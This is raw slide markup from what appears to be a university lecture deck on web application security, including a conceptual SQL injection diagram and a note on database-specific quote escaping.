        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1307651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Escapes with \.     ‘ -&gt; \’   .     DB independent  ---  different DB’s have different rules for escaping.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This snipet is in 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D6F15C-950D-A14E-AF1D-2EE06DBAD479}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327392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CC02AEA-566A-F94F-9495-BF09564F2B10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243666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90513"/>
            <a:ext cx="2190750" cy="58356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90513"/>
            <a:ext cx="6419850" cy="58356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F2463A4-CE34-944C-8485-6059C1894CBE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428743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7010400" y="6477000"/>
            <a:ext cx="2133600" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0D3C8066-2F90-ED4F-92F7-C51C1C7B59C0}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80053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7010400" y="6477000"/>
            <a:ext cx="2133600" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{8FBF7848-7AE8-414E-8497-2BAE6BF9A132}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2848016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7010400" y="6477000"/>
            <a:ext cx="2133600" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E96629AB-B5F9-794B-AF8B-5D9223454CF7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2113391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7010400" y="6477000"/>
            <a:ext cx="2133600" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{795EC15D-60B2-8E48-A63D-C020F18FC5FD}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3606345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9 December 2008</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7010400" y="6477000"/>
            <a:ext cx="2133600" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D0A3F4AA-806F-424E-928C-5C82843C889B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="974892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290513"/>
            <a:ext cx="87630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r>
              <a:rPr lang="en-US"/>
              <a:t>9 December 2008</a:t>
            </a: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7010400" y="6477000"/>
            <a:ext cx="2133600" cy="228600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{84E72749-901C-EC4A-BC90-AF33492ACDAB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2226307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3481436-5419-FB47-949C-D8E224FA3F02}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2098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424C5E9-9623-FE46-85E1-F0AD74EDF21A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25147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2DA9316-BA6F-E040-857F-B298DBF5572B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="897865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C8A005AC-8B78-7C4B-9152-4B38C0EAC2E5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310437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44360F-2ED3-974C-85AD-F94FF42785A9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10607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A51AA5B-7EEA-2C48-B817-9114B5517E45}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405084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490A15E-98B5-CA4D-8195-745DCF2AF511}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125845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8FC3792-573F-9242-A5F8-724805E8A71D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2956548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bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="290513"/>
            <a:ext cx="8763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19139"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9140"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eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2191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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219142" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="6477000"/>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11406F5B-8226-3143-86C4-60E7B6B8DA16}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231960714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Lst>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000" b="1">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000" b="1">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000" b="1">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000" b="1">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000" b="1">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000" b="1">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000" b="1">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000" b="1">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000" b="1">
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック"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6.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/><Relationship Id="rId2"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aypal.com/cgi-bin/webscr?cmd=_home" TargetMode="Externa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8.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1.xml"/><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oleObject" Target="../embeddings/oleObject2.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1752600"/>
            <a:ext cx="8153400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Web Application Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Based on John Mitchell’s</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>155 Slides</a:t>
            </a:r>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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic picture: SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{90AAFDFD-6958-4AC8-BA55-D6DABC5613AF}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696913" y="2667000"/>
            <a:ext cx="1436687" cy="1436688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14341" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6234113" y="4572000"/>
            <a:ext cx="1155700" cy="1420813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1905000"/>
            <a:ext cx="2436813" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14343" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5789613" y="1524000"/>
            <a:ext cx="1681162" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14344" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5805488" y="6000750"/>
            <a:ext cx="1814512" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim SQL DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14345" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2427288" y="2257425"/>
            <a:ext cx="2830512" cy="617538"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14346" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="4040188"/>
            <a:ext cx="1114425" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14347" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2562225" y="2070100"/>
            <a:ext cx="2471738" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>post malicious form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14348" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6184901" y="3651250"/>
            <a:ext cx="1801812" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14349" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7277100" y="3482975"/>
            <a:ext cx="1485900" cy="708025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>unintended </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL query</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14350" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3119438" y="3714750"/>
            <a:ext cx="2638425" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
